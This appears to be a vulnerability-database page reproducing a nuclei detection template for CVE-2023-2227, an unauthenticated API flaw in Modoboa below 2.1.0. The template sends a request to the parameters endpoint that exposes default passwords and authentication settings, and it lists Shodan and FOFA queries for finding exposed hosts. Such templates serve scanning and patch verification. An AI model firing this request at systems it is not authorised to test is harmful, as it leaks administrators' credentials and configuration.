Vulners
Lucene search
Modoboa < 2.1.0 - Improper Authorization
šļøĀ 29 Jun 2026Ā 05:52:57Reported byĀ ProjectDiscoveryTypeĀ 
Ā nucleišĀ github.comšĀ 29Ā Views
| Reporter | Title | Published | Views | Family All 19 |
|---|---|---|---|---|
 | Improper Authorization | 25 Feb 202303:56 | ā | huntr |
 | CVE-2023-2227 | 21 Apr 202316:31 | ā | circl |
 | modoboa ęęé®é¢ę¼ę“ | 21 Apr 202300:00 | ā | cnnvd |
 | Modoboa Information Disclosure Vulnerability | 24 Apr 202300:00 | ā | cnvd |
 | CVE-2023-2227 | 21 Apr 202300:00 | ā | cve |
 | CVE-2023-2227 Improper Authorization in modoboa/modoboa | 21 Apr 202300:00 | ā | cvelist |
 | Improper Authorization in modoboa | 21 Apr 202315:30 | ā | github |
 | CVE-2023-2227 | 21 Apr 202313:15 | ā | nvd |
 | CVE-2023-2227 Improper Authorization in modoboa/modoboa | 21 Apr 202300:00 | ā | osv |
| GHSA-67MG-GM8M-PH5R Improper Authorization in modoboa | 21 Apr 202315:30 | ā | osv |
10
id: CVE-2023-2227
info:
name: Modoboa < 2.1.0 - Improper Authorization
author: ritikchaddha,princechaddha
severity: critical
description: |
Improper Authorization in GitHub repository modoboa/modoboa prior to 2.1.0.
impact: |
Unauthenticated attackers can access sensitive configuration parameters including default passwords and authentication settings through the API endpoint, potentially compromising the entire email management system.
remediation: |
Update Modoboa to version 2.1.0 or later that implements proper authorization checks for the parameters API endpoint.
reference:
- https://huntr.com/bounties/351f9055-2008-4af0-b820-01ff66678bf3
- https://github.com/modoboa/modoboa/commit/7bcd3f6eb264d4e3e01071c97c2bac51cdd6fe97
- https://nvd.nist.gov/vuln/detail/CVE-2023-2227
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.1
cve-id: CVE-2023-2227
cwe-id: CWE-285
epss-score: 0.43756
epss-percentile: 0.98583
cpe: cpe:2.3:a:modoboa:modoboa:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: modoboa
product: modoboa
shodan-query:
- "http.favicon.hash:1949005079"
- http.html:"modoboa"
fofa-query:
- "body=\"Modoboa\""
- body="modoboa"
- icon_hash=1949005079
tags: cve,cve2023,modoboa,exposure,disclosure,vuln
http:
- raw:
- |
GET /api/v2/parameters/core/ HTTP/1.1
Host: {{Hostname}}
User-Agent: 7h3h4ckv157
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'label":'
- 'default_password":'
- 'authentication_type":"local'
condition: and
- type: word
part: header
words:
- 'application/json'
- type: status
status:
- 200
# digest: 4a0a00473045022100d8c0ef2204675744ef13c778b7da02622fea2e91b44c933f0990e7334c347a2e02200a29355f4361ba1ba6b975642ea4d95b7cb03c1c800e8f03b90e9f6594cf38f6:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation withĀ Vulners data
WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data
Api
Power your application withĀ Vulners API
The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access
App
Assess and manage vulnerabilities withĀ VulnersĀ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 3.19.1
CVSS 39.1
EPSS0.43756
SSVC